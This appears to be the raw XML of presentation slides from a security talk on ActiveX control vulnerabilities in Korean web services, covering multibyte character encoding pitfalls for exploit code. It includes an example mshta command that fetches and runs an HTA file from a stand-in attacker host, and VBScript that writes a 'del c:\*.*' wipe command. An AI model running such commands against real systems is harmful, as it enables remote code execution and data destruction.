          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="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Other Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="l" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="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(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="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eg</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="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.,  Acrobat, </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="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Quicktime</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="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 Player, …)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60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131858" y="3447254"/>
            <a:ext cx="7572428" cy="1547823"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="5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Web</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="50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632056" y="3557913"/>
            <a:ext cx="5786478" cy="1365726"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx2">
                  <a:lumMod val="20000"/>
                  <a:lumOff val="80000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="80000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gra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 anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="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Online Banking, Portal, Online game, …</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60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17" name="아래쪽 화살표 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8775724" y="2137557"/>
            <a:ext cx="1214446" cy="4643470"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/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en-US" sz="2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굴림" pitchFamily="50" charset="-127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132386" y="1494615"/>
            <a:ext cx="5185459" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="127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n-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Total : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>400~700</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> ActiveX controls!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="30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"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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C6AD7D1-131D-4574-B3DA-46C6B184349F}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Universal Exploit Code?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Many ActiveX control exploit codes do not work in Windows Korean/Chinese/Japanese edition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Because they use  a different character system, MBCS, with the others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>MBCS(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>Multibyte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Character Sets)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Character sets that use one or two bytes to represent a character because Korean, Japanese and Chinese cannot be encoded in a single byte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ko-KR" dirty="0" smtClean="0"/>
              <a:t>DBCS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The most common implementation of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>MBCS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x00-0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Each byte represents one character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>the same character with an ASCII character set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Greater than 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>A double byte(Lead Byte + Trail Byte) represents one character</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="모서리가 둥근 직사각형 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1989114" y="4995077"/>
            <a:ext cx="7715304" cy="714380"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill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en-US" sz="2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굴림" pitchFamily="50" charset="-127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>
          <a:xfrm>
            <a:off x="4051300" y="7242995"/>
            <a:ext cx="2493963" cy="323850"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0C6AD7D1-131D-4574-B3DA-46C6B184349F}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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ko-KR" dirty="0" smtClean="0"/>
              <a:t>DBCS (Double Byte Character Sets)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060552" y="5066515"/>
            <a:ext cx="746710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ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>B1 E8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>69 73 20 6D 79 20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>66</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 61 6D 69 6c 79 20 6E 61 6D 65 2E</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Courier New" pitchFamily="49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060552" y="5280829"/>
            <a:ext cx="742543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altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="16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ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>김</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>s     m  y     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="16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ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  a  m  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  l  y     n  a  m  e  .</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:ea typeface="맑은 고딕" pitchFamily="50" charset="-127"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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0" dur="80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1" dur="80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" dur="80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4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0" grpId="0"/>
      <p:bldP spid="14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1EC6A70-D7ED-4700-85BD-2995BE4EC50E}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3993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ko-KR" dirty="0" smtClean="0"/>
              <a:t>Exploitation of Process Execution Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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ko-KR" dirty="0" smtClean="0"/>
              <a:t>When you found a vulnerability which can be misused to execute any process,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Maybe you don’t want to execute calc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>You may want to download and execute an intended binary file to demonstrate the vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>You can use mshta.exe to create and execute a binary file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>ex) mshta.exe http://attacker.web.server/CreateBinaryFile.hta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1EC6A70-D7ED-4700-85BD-2995BE4EC50E}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3993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ko-KR" dirty="0" smtClean="0"/>
              <a:t>CreateBinaryFile.hta</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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ko-KR" dirty="0" smtClean="0"/>
              <a:t>HTA(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0"/>
              <a:t>HTml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> Application)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Similar to HTML but executed with no security restriction by mshta.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Trivial to create a text file but not straightforward to create a binary file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1060420" y="3352003"/>
            <a:ext cx="8072494" cy="3240088"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13745"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set f = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso.CreateTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForWriting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="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f.WriteLine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="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(“del c:\*.*”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty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  <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f.Close</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1900" b="0" dirty="0"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1EC6A70-D7ED-4700-85BD-2995BE4EC50E}" type="slidenum">
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3993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ko-KR" dirty="0" smtClean="0"/>
